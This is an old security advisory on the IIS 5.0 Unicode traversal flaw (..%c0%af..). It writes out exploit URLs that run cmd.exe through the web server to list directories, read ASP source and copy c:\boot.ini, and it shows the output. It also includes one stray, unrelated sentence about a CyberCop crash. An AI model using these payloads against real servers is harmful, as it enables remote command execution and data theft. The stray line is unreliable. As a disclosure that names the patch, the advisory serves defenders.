______________________________________________________________________
                                    NtWaK0
                            Bug / Security / Advisory
                            Saturday, October 21, 2000
       IIS 5 and using ..%c0%af../winnt/system32/cmd.exe?/c+type+c:
               To Read any ASP source Code of the server
______________________________________________________________________

o Synopsis

Based on http://www.wiretrip.net/rfp/p/doc.asp?id=57&iface=2

I done some research and found that that ..%c0%af.. can be used to do
more then just directory Listing :)

RISK FACTOR:  HIGH
______________________________________________________________________

o Vulnerable Systems

IIS 5.0 maybe IIS 4 I did not check it
______________________________________________________________________

o Vulnerability Information

Well what i have tried is Reading ASP source code and i was able to
using this syntax :
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\i
netpub\wwwroot\home\*.*
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+type+c:\
inetpub\wwwroot\home\default.asp

And sure here is the source code:

Dim sServerName, sLocalAddress, sRemoteAddress
sServerName = Request.ServerVariables("SERVER_NAME")
sLocalAddress = Request.ServerVariables("LOCAL_ADDR")
sRemoteAddress = Request.ServerVariables("REMOTE_ADDR") %>

An implementation flaw in cybercop engine allows a local Blue Screen
of Death (BSOD) on NT 4.0 (Sp6a + All Hot Fixes Installed).

Now let us do more stuff, you can save a file example
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\b
oot.ini
so you will get promted if you wana save the file or open it

Next I done
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\
boot.ini+c:\bobo.ini

that gave me different error ...

CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
c:\boot.ini
The system cannot find the file specified.
        0 file(s) copied.

Hrm interresting and the file is located in  c:\boot.ini :)


At this point i stoped working on that and sure you can do more then DIR
LISTING

 ______________________________________________________________________
 o Resolution

Microsoft has released MS00-078 to warn of the problem. The patch from
MS00-057 ("File permission canonicalization") fixes this problem
 ______________________________________________________________________
 o Credits
 The discovery of this vulnerability was conducted by Par Osterberg
 some other reasearch was done by rain forest puppy and some by NtWaK0
 ______________________________________________________________________


______________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________._________
Live Well Do Good                                           |
Accept no limitations                                     \(|)/
                                                         --(")--
                                                           /`\  NtWaK0